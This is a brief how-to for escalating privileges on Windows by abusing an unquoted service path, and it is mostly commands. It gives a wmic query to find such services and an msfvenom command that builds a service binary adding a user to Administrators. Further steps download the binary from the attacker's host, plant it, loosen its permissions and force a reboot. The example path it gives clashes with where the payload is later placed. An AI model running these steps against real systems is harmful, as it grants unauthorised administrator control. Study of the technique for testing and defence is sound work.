Windows PrivEsc with Unquoted Service Path

A service path with unquoted and spaces might be vulnerable to privilege escalation.

Investigation

In target machine, find unquoted service path.

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\\Windows\\" | findstr /i /v """                                "

Also query the configuration information for a service.

sc qc "Development Service"

For instance if the service path is "C:\Program Files\Development Files\Devservice Files\Service.exe", we can place the exploit to "C:\Program Files\Devservice.exe" by ignoring paths after a space.

Exploitation

1. Create a Payload

In local machine, create a payload using msvenom.
Replace "victim-user" with the target user who we can access to.

msfvenom -p windows/exec CMD='net localgroup Administrators victim-user /add' -f exe-service -o Devservice.exe

2. Place a Payload to Target Path

Now transfer the payload to target machine.

Invoke-WebRequest -Uri http://<local-ip>:8000/Devservice.exe -OutFile .\Devservice.exe

Then place the payload to the path where we've found in investigation.

mv .\Devservice.exe '\Program Files\Development Files\'

3. Change Permission of the Payload

icacls 'C:\Program Files\Development Files\Devservice.exe' /grant Everyone:F

4. Restart Machine

Restart the target machine, then the victim user should have an administrator's privilege.

# Restart
shutdown /r /t 0
# or PowerShell's command
Restart-Computer